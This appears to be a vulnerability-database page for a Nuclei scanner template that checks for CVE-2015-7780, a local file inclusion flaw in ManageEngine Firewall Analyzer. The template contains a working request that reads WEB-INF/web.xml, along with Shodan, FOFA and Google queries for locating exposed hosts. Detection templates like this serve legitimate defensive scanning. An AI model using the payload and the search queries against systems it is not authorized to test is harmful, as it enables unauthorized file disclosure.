Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-7780
HistorySep 20, 2021 - 1:55 p.m.

ManageEngine Firewall Analyzer <8.0 - Local File Inclusion

2021-09-2013:55:31
ProjectDiscovery
github.com
6

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

6.5 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

51.6%

ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion.

id: CVE-2015-7780

info:
  name: ManageEngine Firewall Analyzer <8.0 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade to a version of ManageEngine Firewall Analyzer that is equal to or greater than 8.0 to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/35933
    - http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html
    - http://jvn.jp/en/jp/JVN21968837/index.html
    - https://nvd.nist.gov/vuln/detail/CVE-2015-7780
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2015-7780
    cwe-id: CWE-22
    epss-score: 0.00151
    epss-percentile: 0.51315
    cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zohocorp
    product: manageengine_firewall_analyzer
    shodan-query: http.title:"opmanager plus"
    fofa-query: title="opmanager plus"
    google-query: intitle:"opmanager plus"
  tags: cve2015,cve,manageengine,edb,lfi,zohocorp

http:
  - method: GET
    path:
      - "{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</web-app>"
          - "java.sun.com"
        condition: and

      - type: word
        part: header
        words:
          - "application/xml"

      - type: status
        status:
          - 200
# digest: 490a0046304402207194d253550542bd30658b6d67814f0dec74914b8d242d858c3a190ba89ddd220220690346796828449895bf7ee397e1db889b20c1341fe2d6114fd187007415a7a5:922c64590222798bb761d5b6d8e72950

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

6.5 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

51.6%

Related for NUCLEI:CVE-2015-7780